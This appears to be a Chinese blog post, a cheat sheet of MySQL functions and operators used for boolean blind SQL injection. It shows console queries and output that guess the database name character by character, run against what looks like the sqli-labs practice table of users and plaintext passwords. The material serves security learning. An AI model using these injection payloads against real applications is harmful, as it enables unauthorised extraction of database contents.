strcmp()
strcmp(str1 , str2 ) = return 0; < return -1; > return 1; mysql> select strcmp((substr(database(),1,1)),0x73); +---------------------------------------+ | strcmp((substr(database(),1,1)),0x73) | +---------------------------------------+ | 0 | +---------------------------------------+ 1 row in set (0.00 sec)
period_diff( str1 , str2 )
# str1 - str2 ; 返回差 , 相等 返回0; mysql> select period_diff(ascii((substr(database(),1,1))),0x73); +---------------------------------------------------+ | period_diff(ascii((substr(database(),1,1))),0x73) | +---------------------------------------------------+ | 0 | +---------------------------------------------------+ 1 row in set (0.00 sec)
TimeDiff( str1 , str2 )
# str1 - str2, 返回 差 , 相等 则返回 0 mysql> select timediff(ascii((substr(database(),1,1))),115); +-----------------------------------------------+ | timediff(ascii((substr(database(),1,1))),115) | +-----------------------------------------------+ | 00:00:00 | +-----------------------------------------------+ 1 row in set (0.00 sec)
FieLd( str0 , str1 , str2 , str3 ......)
# 判断 str0 和哪一个 字符串 相等。
# 相等 返回 下标 , 未找到,返回0
mysql> select field('a0','a1','a2','a0');
+----------------------------+
| field('a0','a1','a2','a0') |
+----------------------------+
| 3 |
+----------------------------+
1 row in set (0.00 sec)
举例用法
mysql> select field(substr(database(),1,1),'s');
+-----------------------------------+
| field(substr(database(),1,1),'s') |
+-----------------------------------+
| 1 |
+-----------------------------------+
1 row in set (0.00 sec)
like
# 相当于 1=1,like 优先级 比><= 高, mysql> select * from users where id=1 like 1; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=1 like 0; Empty set (0.00 sec) 举例应用 mysql> select * from users where id=1 like (if(substr(database(),1,1)='s',1,0)); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec)
rlike / regexp
BetWeen ... And ...
# test_str BETWEEN begin_str AND end_str mysql> select '12' between '11' and '31'; +----------------------------+ | '12' between '11' and '31' | +----------------------------+ | 1 | +----------------------------+ 1 row in set (0.00 sec) mysql> select 'ac' between 'ab' and 'ce'; +----------------------------+ | 'ac' between 'ab' and 'ce' | +----------------------------+ | 1 | +----------------------------+ 1 row in set (0.00 sec) 举例用法 mysql> select database() between 'a' and 'z'; +--------------------------------+ | database() between 's' and 'z' | +--------------------------------+ | 1 | +--------------------------------+ 1 row in set (0.00 sec) select database() between 'a' and 'z'; //1 select database() between 'b' and 'z'; //1 ......... select database() between 's' and 'z'; //1 select database() between 't' and 'z'; //0 mysql> select database() between 'sa' and 'sz'; +----------------------------------+ | database() between 'sa' and 'sz' | +----------------------------------+ | 1 | +----------------------------------+ 1 row in set (0.00 sec) select database() between 'sa' and 'sz'; //1 select database() between 'sb' and 'sz'; //1 select database() between 'sc' and 'sz'; //1 ......... select database() between 'se' and 'sz'; //1 select database() between 'sf' and 'sz'; //0
IN
mysql> select * from users where id=1 and mid(database(),1,1) in (0x73); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=1 and mid(database(),1,2) in (0x7365); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec)
AND 配配合减法
#ascii('a') = 97
mysql> select * from users where id=1 and (select ascii('a')-96);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> select * from users where id=1 and (select ascii('a')-97);
Empty set (0.00 sec)
AND 优先级高于 = ,
select * from users where id=1 and (select ascii('a')-97);
等同于
select * from users where id=(1 and (select ascii('a')-97));
异或运算 注入
# n ^ n = 0; n ^ 0 = n; mysql> select * from users where id=1 ^ length((select database()))-8; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=1 ^ 0; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=1 xor 0; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec)
or 配合减法运算
mysql> select * from users where id=3 or 0; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 3 | Dummy | p@ssword | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=3 or 23; +----+----------+------------+ | id | username | password | +----+----------+------------+ | 1 | Dumb | Dumb | | 2 | Angelina | I-kill-you | | 3 | Dummy | p@ssword | | 4 | secure | crappy | | 5 | stupid | stupidity | | 6 | superman | genious | | 7 | batman | mob!le | | 8 | admin | admin | | 9 | admin1 | admin1 | | 10 | admin2 | admin2 | | 11 | admin3 | admin3 | | 12 | dhakkan | dumbo | | 13 | admin4 | admin4 | | 14 | admin5 | admin5 | +----+----------+------------+ 14 rows in set (0.00 sec) 举例使用 mysql> select * from users where id=3 or ascii(mid(database(),1,1))-115; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 3 | Dummy | p@ssword | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=3 or ascii(mid(database(),1,1))-0x73; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 3 | Dummy | p@ssword | +----+----------+----------+ 1 row in set (0.00 sec)
if()
mysql> select if(1=1,1,0); +-------------+ | if(1=1,1,0) | +-------------+ | 1 | +-------------+ 1 row in set (0.00 sec) mysql> select if(1=2,1,0); +-------------+ | if(1=2,1,0) | +-------------+ | 0 | +-------------+ 1 row in set (0.00 sec) 举例使用 mysql> select * from users where id=3 and if(mid(database(),1,1)='s',1,0); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 3 | Dummy | p@ssword | +----+----------+----------+ 1 row in set (0.00 sec)
ifnull(表达式1,表达式2)
# 如果exp1 为null,则返回exp2的值,否则返回exp1的值 #在注入的时候,重要的是 exp1返回的是否0 mysql> select * from users where id=3 and ifnull(mid(database(),1,1)=0x73,0x20); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 3 | Dummy | p@ssword | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=3 and ifnull(mid(database(),1,1)=0x74,0x20); Empty set (0.00 sec) mysql> select * from users where id=3 and ifnull(mid(database(),1,1)=0x78,0x20); Empty set (0.02 sec)
nullif(表达式1,表达式2)
# 如果 exp1 = exp2 ,返回null, 如果不相等,返回exp1的值 # exp2 不重要 mysql> select * from users where id=3 and nullif(mid(database(),1,1)='s',2); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 3 | Dummy | p@ssword | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=3 and nullif(mid(database(),1,1)='a',2); Empty set (0.00 sec)
标签:字符,set,database,+----+----------+----------+,id,sec,2.1,比较,select From: https://www.cnblogs.com/baiye1/p/17551463.html